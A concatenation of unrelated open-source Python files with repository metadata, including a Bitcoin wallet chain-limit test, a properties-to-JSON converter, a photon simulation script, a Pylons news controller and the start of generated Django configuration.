rawtx = self.nodes[0].createrawtransaction([{"txid":singletxid, "vout":0}], {chain_addrs[0]:node0_balance/2-Decimal('0.01'), chain_addrs[1]:node0_balance/2-Decimal('0.01')})
signedtx = self.nodes[0].signrawtransaction(rawtx)
singletxid = self.nodes[0].sendrawtransaction(signedtx["hex"])
self.nodes[0].generate(1)
# Make a long chain of unconfirmed payments without hitting mempool limit
# Each tx we make leaves only one output of change on a chain 1 longer
# Since the amount to send is always much less than the outputs, we only ever need one output
# So we should be able to generate exactly chainlimit txs for each original output
sending_addr = self.nodes[1].getnewaddress()
txid_list = []
for i in range(chainlimit*2):
txid_list.append(self.nodes[0].sendtoaddress(sending_addr, Decimal('1')))
assert_equal(self.nodes[0].getmempoolinfo()['size'], chainlimit*2)
assert_equal(len(txid_list), chainlimit*2)
# Without walletrejectlongchains, we will still generate a txid
# The tx will be stored in the wallet but not accepted to the mempool
extra_txid = self.nodes[0].sendtoaddress(sending_addr, Decimal('1'))
assert(extra_txid not in self.nodes[0].getrawmempool())
assert(extra_txid in [tx["txid"] for tx in self.nodes[0].listtransactions()])
self.nodes[0].abandontransaction(extra_txid)
total_txs = len(self.nodes[0].listtransactions("*",99999))
# Try with walletrejectlongchains
# Double chain limit but require combining inputs, so we pass SelectCoinsMinConf
stop_node(self.nodes[0],0)
self.nodes[0] = start_node(0, self.options.tmpdir, ["-walletrejectlongchains", "-limitancestorcount="+str(2*chainlimit)])
# wait for loadmempool
timeout = 10
while (timeout > 0 and len(self.nodes[0].getrawmempool()) < chainlimit*2):
time.sleep(0.5)
timeout -= 0.5
assert_equal(len(self.nodes[0].getrawmempool()), chainlimit*2)
node0_balance = self.nodes[0].getbalance()
# With walletrejectlongchains we will not create the tx and store it in our wallet.
assert_raises_message(JSONRPCException, "mempool chain", self.nodes[0].sendtoaddress, sending_addr, node0_balance - Decimal('1'))
# Verify nothing new in wallet
assert_equal(total_txs, len(self.nodes[0].listtransactions("*",99999)))
if __name__ == '__main__':
WalletTest().main()
| 46.044444 | 181 | 0.643018 |
4a1e638e35ad1773516ea44bd40d7edc98cee85f | 2,509 | py | Python | src/javaproperties_cli/tojson.py | jwodder/javaproperties-cli | e1bbe04bbb961bf0832a591bdb8edc6f240cc950 | ["MIT"] | 4 | 2017-04-27T02:11:05.000Z | 2021-12-14T14:53:30.000Z | src/javaproperties_cli/tojson.py | jwodder/javaproperties-cli | e1bbe04bbb961bf0832a591bdb8edc6f240cc950 | ["MIT"] | null | null | null | src/javaproperties_cli/tojson.py | jwodder/javaproperties-cli | e1bbe04bbb961bf0832a591bdb8edc6f240cc950 | ["MIT"] | 2 | 2017-06-11T02:13:53.000Z | 2019-02-07T22:15:54.000Z |
"""
.. program:: properties2json
:program:`properties2json`
--------------------------
NAME
^^^^
:program:`properties2json` — Convert a Java ``.properties`` file to JSON
SYNOPSIS
^^^^^^^^
.. code-block:: shell
properties2json [<OPTIONS>] [<infile> [<outfile>]]
DESCRIPTION
^^^^^^^^^^^
Convert a ``.properties`` file ``infile`` to a JSON object and write the
results to ``outfile``. If not specified, ``infile`` and ``outfile`` default
to standard input and standard output, respectively. The output is encoded in
UTF-8.
.. versionchanged:: 0.6.0
Output encoding is now always UTF-8 instead of being determined by the
locale.
.. versionchanged:: 0.7.0
Key ordering is now preserved by default instead of always being sorted
OPTIONS
^^^^^^^
.. option:: -A, --ascii
.. versionadded:: 0.6.0
Escape all non-ASCII characters in the output with ``\\uXXXX`` escape
sequences. This overrides :option:`--unicode`. This is the default
behavior.
.. option:: -E <encoding>, --encoding <encoding>
Specifies the encoding of the input file; default value: ``iso-8859-1``
(a.k.a. Latin-1)
.. option:: -S, --sort-keys
.. versionadded:: 0.7.0
Sort entries in output by key
.. option:: -U, --unicode
.. versionadded:: 0.6.0
Output non-ASCII characters literally. This overrides :option:`--ascii`.
"""
from collections import OrderedDict
import json
import click
from javaproperties import load
from .util import command, encoding_option, infile_type, outfile_type
@command()
@click.option(
"-A/-U",
"--ascii/--unicode",
"ensure_ascii",
default=True,
help="Whether to escape non-ASCII characters or output raw",
)
@encoding_option
@click.option("-S", "--sort-keys", is_flag=True, help="Sort entries in output by key")
@click.argument("infile", type=infile_type, default="-")
@click.argument("outfile", type=outfile_type, default="-")
def properties2json(infile, outfile, encoding, ensure_ascii, sort_keys):
"""Convert a Java .properties file to JSON"""
with click.open_file(infile, encoding=encoding) as fp:
props = load(fp, object_pairs_hook=OrderedDict)
with click.open_file(outfile, "w", encoding="utf-8") as fp:
json.dump(
props,
fp,
sort_keys=sort_keys,
indent=4,
separators=(",", ": "),
ensure_ascii=ensure_ascii,
)
fp.write("\n")
if __name__ == "__main__":
properties2json() # pragma: no cover
| 25.09 | 86 | 0.648466 |
4a1e647e258314f5f330905773490873897de808 | 3,979 | py | Python | uboone/run_uboone.py | NuTufts/chroma_lartpc | ea6d1a62d22eeeaac069efdef1068a56be683fcc | ["BSD-3-Clause"] | null | null | null | uboone/run_uboone.py | NuTufts/chroma_lartpc | ea6d1a62d22eeeaac069efdef1068a56be683fcc | ["BSD-3-Clause"] | null | null | null | uboone/run_uboone.py | NuTufts/chroma_lartpc | ea6d1a62d22eeeaac069efdef1068a56be683fcc | ["BSD-3-Clause"] | null | null | null |
import os,sys,time
#os.environ['PYOPENCL_CTX']='0:0'
#os.environ['PYOPENCL_COMPILER_OUTPUT'] = '0'
#os.environ['CUDA_PROFILE'] = '1'
import chroma.api as api
#api.use_opencl()
api.use_cuda()
import numpy as np
try:
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph as pg
import pyqtgraph.opengl as gl
from chroma.display.pyqtdisplay import PyQtDisplay
except:
pass
from chroma.sim import Simulation
from chroma.event import Photons
from chroma.gpu.photon_fromstep import GPUPhotonFromSteps
import chroma.event
# LOAD CHROMA UBOONE
nthreads_per_block = 64
DISPLAY = False
from uboone import uboone
def gen_stepdata_photons( context ):
steps = np.load( 'steps.npy' )
photons = GPUPhotonFromSteps( steps, cl_context=context )
return photons
def gen_photons( nphotons ):
dphi = np.random.uniform(0,2.0*np.pi, nphotons)
dcos = np.random.uniform(-1.0, 1.0, nphotons)
dir = np.array( zip( np.sqrt(1-dcos[:]*dcos[:])*np.cos(dphi[:]), np.sqrt(1-dcos[:]*dcos[:])*np.sin(dphi[:]), dcos[:] ), dtype=np.float32 )
pos = np.tile([0,0,0], (nphotons,1)).astype(np.float32)
pol = np.zeros_like(pos)
phi = np.random.uniform(0, 2*np.pi, nphotons).astype(np.float32)
pol[:,0] = np.cos(phi)
pol[:,1] = np.sin(phi)
pol = np.cross( pol, dir )
for n,p in enumerate(pol):
norm = np.sqrt( p[0]*p[0] + p[1]*p[1] + p[2]*p[2] )
p /= norm
t = np.zeros(nphotons, dtype=np.float32) + 100.0 # Avoid negative photon times
wavelengths = np.empty(nphotons, np.float32)
wavelengths.fill(128.0)
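    # 128 nm is the vacuum-ultraviolet scintillation wavelength of liquid argon,
    # which is presumably why every generated photon is given this fixed wavelength.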
return Photons(pos=pos, dir=dir, pol=pol, t=t, wavelengths=wavelengths)
if __name__ == "__main__":
try:
if DISPLAY:
app = QtGui.QApplication([])
except:
pass
start = time.time()
det = uboone()
print "[ TIME ] Load detector data ",time.time()-start,"secs"
try:
if DISPLAY:
display = PyQtDisplay( det )
except:
pass
print "[ Start Sim. ]"
start = time.time()
sim = Simulation(det, geant4_processes=0, nthreads_per_block=nthreads_per_block, max_blocks=1024)
print "[ TIME ] push geometry data to GPU: ",time.time()-start,"secs"
nphotons = 1000000
start = time.time()
#photons = gen_photons( nphotons )
photons = gen_stepdata_photons( sim.context ).get()
print "[ TIME ] generate photons ",time.time()-start,"secs"
start = time.time()
events = sim.simulate( photons, keep_photons_end=True, max_steps=2000)
print "[ TIME ] propagate photons ",time.time()-start,"secs"
for ev in events:
nhits = ev.channels.hit[ np.arange(0,36)[:] ]
print "Channels with Hits: "
print nhits
print "Photoelectrons in each channel: "
print ev.channels.q
detected_photons = ev.photons_end.flags[:] & chroma.event.SURFACE_DETECT # bit-wise AND. if detected bit set, then value >0, otherwise 0.
print "Detected photons: ",np.count_nonzero( detected_photons )," frac: ",np.count_nonzero( detected_photons )/len(photons.pos)
print "hit prep: ",len( ev.photons_end.last_hit_triangles ),len(det.solid_id_to_channel_index),len(det.solid_id)
ev.photons_end.dump_history()
channelhit = np.zeros( len(detected_photons), dtype=np.int )
channelhit[:] = det.solid_id_to_channel_index[ det.solid_id[ ev.photons_end.last_hit_triangles[:] ] ]
#for n,f in enumerate(detected_photons):
# if f!=0:
# # by convention chroma starts event at t=100.0
# print "HIT DETID=",channelhit[n]," POS=",ev.photons_end.pos[n,:]," TIME=",ev.photons_end.t[n]-100.0
try:
if DISPLAY:
display.plotEvent( ev )
except:
pass
try:
if DISPLAY:
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
except:
pass
| 33.720339 | 147 | 0.636341 |
4a1e64e42e8bbba554876e2ae0e49f0347fc0328 | 278 | py | Python | desafios/desafio38.py | ravisousag/python2 | 36ec19b40aba543764285caf2de02893a528d4d2 | ["MIT"] | null | null | null | desafios/desafio38.py | ravisousag/python2 | 36ec19b40aba543764285caf2de02893a528d4d2 | ["MIT"] | null | null | null | desafios/desafio38.py | ravisousag/python2 | 36ec19b40aba543764285caf2de02893a528d4d2 | ["MIT"] | null | null | null |
a = int(input('Insira primeiro número: '))
b = int(input('Insira segundo número: '))
if a>b:
print('O número A({}) é maior que o número B({})'.format(a,b))
elif b>a:
print('O número B({}) é maior que o número A({})'.format(b,a))
else:
print('Os números são iguais') | 30.888889 | 66 | 0.611511 |
4a1e6581577d9051981961daae7265c54974a413 | 3,304 | py | Python | Classifier/MSE_COS_accuracy.py | climate-ai/truebranch | 79345260540b250f6a0f99103df98cf45df2caff | ["MIT"] | 2 | 2020-06-30T02:56:17.000Z | 2020-11-09T16:32:41.000Z | Classifier/MSE_COS_accuracy.py | climate-ai/truebranch | 79345260540b250f6a0f99103df98cf45df2caff | ["MIT"] | 6 | 2021-02-02T22:59:46.000Z | 2022-03-12T00:46:53.000Z | Classifier/MSE_COS_accuracy.py | climate-ai/truebranch | 79345260540b250f6a0f99103df98cf45df2caff | ["MIT"] | null | null | null |
#import modules
from torchvision import datasets, transforms
import numpy as np
import scipy.spatial  # scipy.spatial.distance.cosine is used below
from sklearn import metrics
val_transform = transforms.Compose([transforms.Resize(224),
                                    transforms.ToTensor(),
                                    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])
test_dataset = datasets.ImageFolder('/Users/Simona/Fresno_Area/test', transform=val_transform)
# Define the evaluation helper before it is called below.
def MSE_COS(test_emb, test_dataset):
    # Pair each drone embedding (even index) with every Planet embedding (odd index)
    # and record the MSE, the cosine similarity, and the label pair for each match.
    MSE_tot = []
    labels_tot = []
    COS_tot = []
    for i in range(0, len(test_emb), 2):
        MSE_sameloc = []
        labels_list = []
        COS_sameloc = []
        for j in range(0, len(test_emb), 2):
            Feature_vec_drone_img = test_emb[i]
            Feature_vec_planet_img = test_emb[j + 1]
            labels = (test_dataset[i][1], test_dataset[j + 1][1])
            labels_list.append(labels)
            MSE_sameloc.append(metrics.mean_squared_error(Feature_vec_drone_img, Feature_vec_planet_img))
            COS_sameloc.append(1 - scipy.spatial.distance.cosine(Feature_vec_planet_img, Feature_vec_drone_img))
        MSE_tot.append(MSE_sameloc)
        labels_tot.append(labels_list)
        COS_tot.append(COS_sameloc)
    # MSE: count how often one of the 5 closest matches (smallest MSE) shares the true label.
    top_5_count_MSE = 0
    for i in range(len(MSE_tot)):
        list1 = np.asarray(MSE_tot[i])
        list2 = np.asarray(labels_tot[i])
        idx = np.argsort(list1)
        list2 = list2[idx]
        top_5_l = list2[0:5]
        for k in range(5):
            if top_5_l[k][0] == top_5_l[k][1]:
                top_5_count_MSE += 1
    print("MSE accuracy", top_5_count_MSE / len(MSE_tot) * 100)
    # COS: same idea, but the best matches have the *largest* cosine similarity.
    top_5_count_COS = 0
    for i in range(len(COS_tot)):
        list1 = np.asarray(COS_tot[i])
        list2 = np.asarray(labels_tot[i])
        idx = np.argsort(list1)
        list2 = np.flipud(list2[idx])
        top_5_l = list2[0:5]
        for k in range(5):
            if top_5_l[k][0] == top_5_l[k][1]:
                top_5_count_COS += 1
    print("COS accuracy", top_5_count_COS / len(COS_tot) * 100)
test_emb_triplet = np.loadtxt('/Users/Simona/Fresno_Area/test_emb_triplet1')
print('MSE_COS_triplet')
MSE_COS(test_emb_triplet, test_dataset)
test_emb_raw = np.loadtxt('/Users/Simona/Fresno_Area/X_test_raw')
print('MSE_COS_raw')
MSE_COS(test_emb_raw, test_dataset)
test_emb_tile2vec = np.loadtxt('/Users/Simona/Fresno_Area/X_test_tile2vec')
print('MSE_COS_tile2vec')
MSE_COS(test_emb_tile2vec, test_dataset)
test_emb_resnet18 = np.loadtxt('/Users/Simona/Fresno_Area/X_test_resnet18imagenet')
print('MSE_COS_resnet18')
MSE_COS(test_emb_resnet18, test_dataset)
test_emb_resnet50 = np.loadtxt('/Users/Simona/Fresno_Area/X_test_resnet50resisc45')
print('MSE_COS_resnet50')
MSE_COS(test_emb_resnet50, test_dataset)
test_emb_pca = np.loadtxt('/Users/Simona/Fresno_Area/X_test_PCA')
print('MSE_COS_pca')
MSE_COS(test_emb_pca, test_dataset)
test_emb_kmeans = np.loadtxt('/Users/Simona/Fresno_Area/X_test_kmeans')
print('MSE_COS_kmeans')
MSE_COS(test_emb_kmeans, test_dataset)
| 37.977011 | 113 | 0.665254 |
4a1e662a4706bf0e0ff99f55d0cceb49f507f6cf | 676 | py | Python | 3_advanced/chapter17/solutions/compute_similarity.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | ["MIT"] | 4 | 2021-03-01T00:32:45.000Z | 2021-05-21T22:01:52.000Z | 3_advanced/chapter17/solutions/compute_similarity.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | ["MIT"] | 29 | 2020-09-12T22:56:04.000Z | 2021-09-25T17:08:42.000Z | 3_advanced/chapter17/solutions/compute_similarity.py | code4tomorrow/Python | 035b6f5d8fd635a16caaff78bcd3f582663dadc3 | ["MIT"] | 7 | 2021-02-25T01:50:55.000Z | 2022-02-28T00:00:42.000Z |
# Given two sets of integers A and B (each element in these sets are
# between 1 and 1000 inclusive), find the similarity of the two sets
# (the sets are guaranteed to be nonempty). The similarity is a number
# which is computed by dividing the size of the intersection of the
# two sets by their union size.
# Note: the intersection is the # of elements that both sets have in common.
def computeSimilarity(set1, set2):
intersectionSize = 0
for elem in set1:
if elem in set2:
intersectionSize += 1
unionSize = len(set1) + len(set2) - intersectionSize
return intersectionSize / float(unionSize)
print(computeSimilarity({1, 2}, {1, 3}))
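# Worked example: {1, 2} and {1, 3} share one element and their union has three,
# so the call above prints 1/3 = 0.3333333333333333.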
| 35.578947 | 76 | 0.713018 |
4a1e680fb36f88a118527f72e6d01b3e3fb11a6f | 9,794 | py | Python | userbot/modules/system_stats.py | huhugh221/ProjectFizilionFork | 9af2d6219b5e4a461f465964f38c3062b38c3a01 | ["Naumen", "Condor-1.1", "MS-PL"] | 3 | 2021-08-24T15:48:13.000Z | 2021-09-20T23:20:07.000Z | userbot/modules/system_stats.py | Pewdeadcake/ProjectFizilionFork | 5599e6797781a96df37f302520bb3c5571bd54e0 | ["Naumen", "Condor-1.1", "MS-PL"] | null | null | null | userbot/modules/system_stats.py | Pewdeadcake/ProjectFizilionFork | 5599e6797781a96df37f302520bb3c5571bd54e0 | ["Naumen", "Condor-1.1", "MS-PL"] | 18 | 2021-07-03T15:12:28.000Z | 2021-08-13T07:27:24.000Z |
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for getting information about the server. """
import platform
import shutil
import sys
import os
import pip
import distro
import time
from asyncio import sleep
from asyncio import create_subprocess_exec as asyncrunapp
from asyncio.subprocess import PIPE as asyncPIPE
from datetime import datetime
from os import remove
from platform import python_version, uname
from shutil import which
import psutil
from git import Repo
from telethon import __version__, version
from userbot import ALIVE_LOGO, ALIVE_MESSAGE, ALIVE_NAME, CMD_HELP, TIMEOUT, USERBOT_VERSION, StartTime, bot, trgg
from userbot.events import register
# ================= CONSTANT =================
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else uname().node
repo = Repo()
modules = CMD_HELP
# ============================================
async def get_readable_time(seconds: int) -> str:
count = 0
up_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
if count < 3:
remainder, result = divmod(seconds, 60)
else:
remainder, result = divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
up_time += time_list.pop() + ", "
time_list.reverse()
up_time += ":".join(time_list)
return up_time
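# Example with this formatting scheme: awaiting get_readable_time(3661) yields "1h:1m:1s".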
@register(outgoing=True, pattern="^\{trg}spc".format(trg=trgg))
async def psu(event):
uname = platform.uname()
softw = "**System Information**\n"
softw += f"`System : {uname.system}`\n"
softw += f"`Release : {uname.release}`\n"
softw += f"`Version : {uname.version}`\n"
softw += f"`Machine : {uname.machine}`\n"
# Boot Time
boot_time_timestamp = psutil.boot_time()
bt = datetime.fromtimestamp(boot_time_timestamp)
softw += f"`Boot Time: {bt.day}/{bt.month}/{bt.year} {bt.hour}:{bt.minute}:{bt.second}`\n"
# CPU Cores
cpuu = "**CPU Info**\n"
cpuu += "`Physical cores : " + str(psutil.cpu_count(logical=False)) + "`\n"
cpuu += "`Total cores : " + str(psutil.cpu_count(logical=True)) + "`\n"
# CPU frequencies
cpufreq = psutil.cpu_freq()
cpuu += f"`Max Frequency : {cpufreq.max:.2f}Mhz`\n"
cpuu += f"`Min Frequency : {cpufreq.min:.2f}Mhz`\n"
cpuu += f"`Current Frequency: {cpufreq.current:.2f}Mhz`\n\n"
# CPU usage
cpuu += "**CPU Usage Per Core**\n"
for i, percentage in enumerate(psutil.cpu_percent(percpu=True)):
cpuu += f"`Core {i} : {percentage}%`\n"
cpuu += "\n**Total CPU Usage**\n"
cpuu += f"`All Core: {psutil.cpu_percent()}%`\n"
# RAM Usage
svmem = psutil.virtual_memory()
memm = "**Memory Usage**\n"
memm += f"`Total : {get_size(svmem.total)}`\n"
memm += f"`Available : {get_size(svmem.available)}`\n"
memm += f"`Used : {get_size(svmem.used)} ({svmem.percent}%)`\n"
# Disk Usage
dtotal, dused, dfree = shutil.disk_usage(".")
disk = "**Disk Usage**\n"
disk += f"`Total : {get_size(dtotal)}`\n"
disk += f"`Free : {get_size(dfree)}`\n"
disk += f"`Used : {get_size(dused)}`\n"
# Bandwidth Usage
bw = "**Bandwith Usage**\n"
bw += f"`Upload : {get_size(psutil.net_io_counters().bytes_sent)}`\n"
bw += f"`Download: {get_size(psutil.net_io_counters().bytes_recv)}`\n"
help_string = f"{str(softw)}\n"
help_string += f"{str(cpuu)}\n"
help_string += f"{str(memm)}\n"
help_string += f"{str(disk)}\n"
help_string += f"{str(bw)}\n"
help_string += "**Engine Info**\n"
help_string += f"`Python {sys.version}`\n"
help_string += f"`Telethon {__version__}`"
await event.edit(help_string)
def get_size(bytes, suffix="B"):
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
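# For example, get_size(1536) returns "1.50KB" and get_size(1073741824) returns "1.00GB".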
@register(outgoing=True, pattern="^\{trg}sysd$".format(trg=trgg))
async def sysdetails(sysd):
""" For .sysd command, get system info using neofetch. """
if not sysd.text[0].isalpha() and sysd.text[0] not in ("/", "#", "@", "!"):
try:
fetch = await asyncrunapp(
"neofetch",
"--stdout",
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await fetch.communicate()
result = str(stdout.decode().strip()) + str(stderr.decode().strip())
await sysd.edit("`" + result + "`")
except FileNotFoundError:
await sysd.edit("`Install neofetch first !!`")
@register(outgoing=True, pattern="^\{trg}botver$".format(trg=trgg))
async def bot_ver(event):
""" For .botver command, get the bot version. """
if not event.text[0].isalpha() and event.text[0] not in ("/", "#", "@", "!"):
if which("git") is not None:
ver = await asyncrunapp(
"git",
"describe",
"--all",
"--long",
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await ver.communicate()
verout = str(stdout.decode().strip()) + str(stderr.decode().strip())
rev = await asyncrunapp(
"git",
"rev-list",
"--all",
"--count",
stdout=asyncPIPE,
stderr=asyncPIPE,
)
stdout, stderr = await rev.communicate()
revout = str(stdout.decode().strip()) + str(stderr.decode().strip())
await event.edit(
"`Userbot Version: " f"{verout}" "` \n" "`Revision: " f"{revout}" "`"
)
else:
await event.edit(
"Shame that you don't have git, you're running - 'v2.5' anyway!"
)
@register(outgoing=True, pattern=r"^\{trg}(alive|on)$".format(trg=trgg))
async def amireallyalive(alive):
""" For .alive command, check if the bot is running. """
uptime = await get_readable_time((time.time() - StartTime))
DEFAULT_MESSAGE = (
f"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
f"**Fizilion** is up [--Premium]\n"
f">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n"
f"• `Owner : {DEFAULTUSER} `\n"
f"• `Loaded modules : {len(modules)} `\n"
f"• `Branch : {repo.active_branch.name} `\n"
f"• `Bot Version : {USERBOT_VERSION} `\n"
f"• `Bot Uptime : {uptime} `\n\n"
f"Use `.help` for more info\n"
)
output = ALIVE_MESSAGE or DEFAULT_MESSAGE
if ALIVE_LOGO:
try:
logo = ALIVE_LOGO
msg = await bot.send_file(alive.chat_id, logo, caption=output, del_in=10)
await alive.delete()
await sleep(30)
except BaseException:
await alive.edit(
output + "\n\n *`The provided logo is invalid."
"\nMake sure the link is directed to the logo picture`"
)
else:
msg=await alive.edit(output)
await sleep(30)
if TIMEOUT:
await msg.delete()
@register(outgoing=True, pattern="^\{trg}aliveu".format(trg=trgg))
async def amireallyaliveuser(username):
""" For .aliveu command, change the username in the .alive command. """
message = username.text
output = ".aliveu [new user without brackets] nor can it be empty"
if not (message == ".aliveu" or message[7:8] != " "):
newuser = message[8:]
global DEFAULTUSER
DEFAULTUSER = newuser
output = "Successfully changed user to " + newuser + "!"
await username.edit("`" f"{output}" "`")
@register(outgoing=True, pattern="^\{trg}resetalive$".format(trg=trgg))
async def amireallyalivereset(ureset):
""" For .resetalive command, reset the username in the .alive command. """
global DEFAULTUSER
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else uname().node
await ureset.edit("`" "Successfully reset user for alive!" "`")
@register(outgoing=True, pattern="^\{trg}changelog$".format(trg=trgg))
async def chnglogg(event):
await event.edit(
"In the latest update, these are the changes:\
\n\nAdded silent old kang\
        \nUse it by replying to a sticker and sending .ok\
        \n\nAdded AFK by bot. To set it up, make a group, add the bots to it, then add its id as AFK_CHATID.\nTo go AFK via the bots send .afk-b; it takes a reason like the normal afk and removes AFK when you send any message.\
        \n\nAdded purge from and to, but it's not complete yet, so it is not recommended to use.\
\n\nThis changelog is valid for the last update to forkzilion (ProjectFizilion fork by AbOuLfOoOoOuF) only.")
CMD_HELP.update(
{
"sysd": ".sysd\
\nUsage: Shows system information using neofetch.\
\n\n.spc\
\nUsage: Show system specification."
}
)
CMD_HELP.update(
{
"botver": ".botver\
\nUsage: Shows the userbot version."
}
)
CMD_HELP.update(
{
"alive": ".alive | .on\
        \nUsage: Type .alive/.on to see whether your bot is working or not.\
\n\n.aliveu <text>\
\nUsage: Changes the 'user' in alive to the text you want.\
\n\n.resetalive\
\nUsage: Resets the user to default."
}
)
CMD_HELP.update(
{
"changelog": ".changelog\
\nUsage: Check the last changes done to the userbot"
}
)
| 35.357401 | 227 | 0.579743 |
4a1e69ae6e725f280320173c69ef8334b2385a95 | 4,272 | py | Python | ferrox/controllers/news.py | hsuaz/ferrox | ac89b698e6c12c57c7a3128b6a25a3dc100bfc15 | ["MIT"] | 3 | 2017-01-03T20:55:16.000Z | 2022-03-01T15:21:53.000Z | ferrox/controllers/news.py | hsuaz/ferrox | ac89b698e6c12c57c7a3128b6a25a3dc100bfc15 | ["MIT"] | null | null | null | ferrox/controllers/news.py | hsuaz/ferrox | ac89b698e6c12c57c7a3128b6a25a3dc100bfc15 | ["MIT"] | 4 | 2017-01-03T20:48:09.000Z | 2022-03-01T15:21:58.000Z |
from ferrox.lib.base import *
from ferrox.lib.formgen import FormGenerator
from ferrox.model import form
import formencode
import logging
import sqlalchemy
log = logging.getLogger(__name__)
class NewsController(BaseController):
def index(self):
"""Paged list of all news."""
page_link_var = 'p'
page = request.params.get(page_link_var, 0)
c.newsitems = model.Session.query(model.News) \
.order_by(model.News.time.desc())
return render('news/index.mako')
def view(self, id):
page_link_var = 'p'
page = request.params.get(page_link_var, 0)
c.news = model.Session.query(model.News).get(id)
if not c.news:
abort(404)
return render('news/view.mako')
@check_perm('news.manage')
def post(self):
"""Form for posting news."""
c.form = FormGenerator()
return render('news/post.mako')
@check_perm('news.manage')
def do_post(self):
"""Form handler for posting news."""
c.form = FormGenerator()
schema = model.form.NewsForm()
try:
form_data = schema.to_python(request.params)
except formencode.Invalid, error:
c.form.defaults = error.value
c.form.errors = error.error_dict
return render('news/post.mako')
title = h.html_escape(form_data['title'])
content = form_data['content']
news = model.News(title=title, content=content, user=c.auth_user)
news.is_anonymous = form_data['is_anonymous']
if form_data['avatar_id']:
av = model.Session.query(model.UserAvatar).filter_by(id = form_data['avatar_id']).filter_by(user_id = c.auth_user.id).one()
news.avatar = av
model.Session.add(news)
model.Session.commit()
h.redirect_to('/news')
@check_perm('news.manage')
def edit(self):
"""Form for editing news."""
c.form = FormGenerator()
c.item = model.Session.query(model.News).get(c.id)
c.form.defaults = h.to_dict(c.item)
return render('news/edit.mako')
@check_perm('news.manage')
def edit_commit(self, id):
"""Form handler for editing news."""
c.item = model.Session.query(model.News).get(id)
schema = model.form.NewsForm()
try:
form_data = schema.to_python(request.params)
except formencode.Invalid, error:
c.form = FormGenerator(form_error=error)
return render('news/edit.mako')
title = h.html_escape(form_data['title'])
#content = h.html_escape(form_data['content'])
content = form_data['content']
if c.item.title != title or c.item.content != content:
if c.item.editlog == None:
c.item.editlog = model.EditLog(c.auth_user)
editlog_entry = model.EditLogEntry(c.auth_user, 'no reasons yet',
c.item.title, c.item.content,
c.item.content_parsed)
c.item.editlog.update(editlog_entry)
c.item.title = title
c.item.update_content(content)
c.item.is_anonymous = form_data['is_anonymous']
#c.item.avatar_id = form_data['avatar_id']
if form_data['avatar_id']:
av = model.Session.query(model.UserAvatar).filter_by(id = form_data['avatar_id']).filter_by(user_id = c.auth_user.id).one()
c.item.avatar = av
else:
c.item.avatar = None
model.Session.commit()
h.redirect_to('/news')
@check_perm('news.manage')
def delete(self):
"""Form handler for deleting news."""
news_q = model.Session.query(model.News)
item = news_q.filter_by(id=c.id).one()
item.is_deleted = True
model.Session.add(item)
model.Session.commit()
h.redirect_to('/news')
@check_perm('news.manage')
def undelete(self):
"""Form handler for restoring deleted news."""
news_q = model.Session.query(model.News)
item = news_q.filter_by(id=c.id).one()
item.is_deleted = False
model.Session.add(item)
model.Session.commit()
h.redirect_to('/news')
| 36.512821 | 135 | 0.593165 |
4a1e69bc25964f24b4d397ecc265e017b6cfec0c | 404 | py | Python | versionSystem/wsgi.py | kasper190/versionSystem | d5f1df4c226e604c1cecb01ef1c2fa2673934c9c | ["MIT"] | null | null | null | versionSystem/wsgi.py | kasper190/versionSystem | d5f1df4c226e604c1cecb01ef1c2fa2673934c9c | ["MIT"] | null | null | null | versionSystem/wsgi.py | kasper190/versionSystem | d5f1df4c226e604c1cecb01ef1c2fa2673934c9c | ["MIT"] | null | null | null |
"""
WSGI config for versionSystem project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "versionSystem.settings")
application = get_wsgi_application()
| 23.764706 | 78 | 0.792079 |
4a1e6e092db1bc844b45ddf8390e5b4ac89f4867 | 3,271 | py | Python | yhsite/yhsite/settings.py | yuheng19981212/python-Django-mysite-study | ba1c747d84f5ae926f564f890524ca499c9f988b | ["MIT"] | null | null | null | yhsite/yhsite/settings.py | yuheng19981212/python-Django-mysite-study | ba1c747d84f5ae926f564f890524ca499c9f988b | ["MIT"] | null | null | null | yhsite/yhsite/settings.py | yuheng19981212/python-Django-mysite-study | ba1c747d84f5ae926f564f890524ca499c9f988b | ["MIT"] | null | null | null |
"""
Django settings for yhsite project.
Generated by 'django-admin startproject' using Django 3.0.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6-kkx7zd%_*g)_)j*g6#c#&4%ssugzhzyfwkb$x7gs^n_8@*x4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
